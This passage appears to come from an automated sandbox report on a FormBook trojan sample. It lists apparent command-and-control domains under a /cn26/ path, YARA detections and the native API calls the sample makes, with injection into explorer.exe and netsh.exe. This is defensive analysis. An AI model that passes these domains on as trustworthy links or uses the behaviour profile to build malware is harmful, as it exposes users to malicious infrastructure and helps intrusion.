                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dehamobilya.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dehamobilya.com/cn26/www.happyjumps.co
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dehamobilya.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e2olyiab.shop
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e2olyiab.shop/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e2olyiab.shop/cn26/www.yipicircle.life
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.e2olyiab.shopReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foton.africa
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foton.africa/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foton.africa/cn26/www.e2olyiab.shop
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foton.africaReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.happyjumps.co
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.happyjumps.co/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.happyjumps.co/cn26/www.tires-book-robust.bond
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.happyjumps.coReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j0mui3.shop
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j0mui3.shop/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j0mui3.shop/cn26/www.cgffwelcome.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j0mui3.shopReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scientificmetalscorp.co
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scientificmetalscorp.co/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scientificmetalscorp.co/cn26/www.ajtsistemas.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scientificmetalscorp.coReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shopusuniform.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shopusuniform.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shopusuniform.com/cn26/www.j0mui3.shop
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shopusuniform.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sswpdx.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sswpdx.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sswpdx.com/cn26/www.scientificmetalscorp.co
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sswpdx.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tempotrekstore.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tempotrekstore.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tempotrekstore.com/cn26/www.xztyvk.xyz
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tempotrekstore.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theburnscleanteam.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theburnscleanteam.com/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theburnscleanteam.com/cn26/www.tiensbangladesh.net
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theburnscleanteam.comReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiensbangladesh.net
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiensbangladesh.net/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiensbangladesh.net/cn26/www.shopusuniform.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tiensbangladesh.netReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tires-book-robust.bond
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tires-book-robust.bond/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tires-book-robust.bond/cn26/www.foton.africa
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tires-book-robust.bondReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xztyvk.xyz
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xztyvk.xyz/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xztyvk.xyz/cn26/www.sswpdx.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xztyvk.xyzReferer:
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipicircle.life
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipicircle.life/cn26/
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipicircle.life/cn26/www.tempotrekstore.com
                Source: explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipicircle.lifeReferer:
                Source: explorer.exe, 00000007.00000003.3098637821.000000000C513000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4451078883.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2012740355.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000007.00000000.2009042834.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000007.00000002.4446934807.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000007.00000002.4444797028.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2009042834.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000007.00000003.3094915197.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2007823850.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4443539368.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                Source: explorer.exe, 00000007.00000003.3099099836.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000007.00000003.3777677954.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098080000.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4447809365.0000000009D42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000007.00000000.2012740355.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4450786934.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                Source: explorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                Source: hOe2JrpIAE.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: explorer.exe, 00000007.00000002.4453541198.0000000010E2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4443371821.00000000046CF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000007.00000002.4452293523.000000000E4F2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: hOe2JrpIAE.exe PID: 4952, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: hOe2JrpIAE.exe PID: 2796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: netsh.exe PID: 5712, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,6_2_0041A540
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_0041A40E NtReadFile,6_2_0041A40E
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182B60 NtClose,LdrInitializeThunk,6_2_01182B60
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01182BF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182AD0 NtReadFile,LdrInitializeThunk,6_2_01182AD0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182D10 NtMapViewOfSection,LdrInitializeThunk,6_2_01182D10
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_01182D30
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182DD0 NtDelayExecution,LdrInitializeThunk,6_2_01182DD0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01182DF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01182C70
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_01182CA0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182F30 NtCreateSection,LdrInitializeThunk,6_2_01182F30
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182F90 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01182F90
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182FB0 NtResumeThread,LdrInitializeThunk,6_2_01182FB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182FE0 NtCreateFile,LdrInitializeThunk,6_2_01182FE0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_01182E80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01182EA0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01184340 NtSetContextThread,6_2_01184340
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01184650 NtSuspendThread,6_2_01184650
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182B80 NtQueryInformationFile,6_2_01182B80
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182BA0 NtEnumerateValueKey,6_2_01182BA0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182BE0 NtQueryValueKey,6_2_01182BE0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182AB0 NtWaitForSingleObject,6_2_01182AB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182AF0 NtWriteFile,6_2_01182AF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182D00 NtSetInformationFile,6_2_01182D00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182DB0 NtEnumerateKey,6_2_01182DB0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182C00 NtQueryInformationProcess,6_2_01182C00
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182C60 NtCreateKey,6_2_01182C60
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182CC0 NtQueryVirtualMemory,6_2_01182CC0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182CF0 NtOpenProcess,6_2_01182CF0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182F60 NtCreateProcessEx,6_2_01182F60
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182FA0 NtQuerySection,6_2_01182FA0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182E30 NtWriteVirtualMemory,6_2_01182E30
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01182EE0 NtQueueApcThread,6_2_01182EE0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01183010 NtOpenDirectoryObject,6_2_01183010
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01183090 NtSetValueKey,6_2_01183090
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011835C0 NtCreateMutant,6_2_011835C0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_011839B0 NtGetContextThread,6_2_011839B0
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01183D10 NtOpenProcessToken,6_2_01183D10
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exeCode function: 6_2_01183D70 NtOpenThread,6_2_01183D70
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DBE12 NtProtectVirtualMemory,7_2_0E4DBE12
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DA232 NtCreateFile,7_2_0E4DA232
                Source: C:\Windows\explorer.exeCode function: 7_2_0E4DBE0A NtProtectVirtualMemory,7_2_0E4DBE0A
                Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03D02B60 NtClose,LdrInitializeThunk,8_2_03D02B60
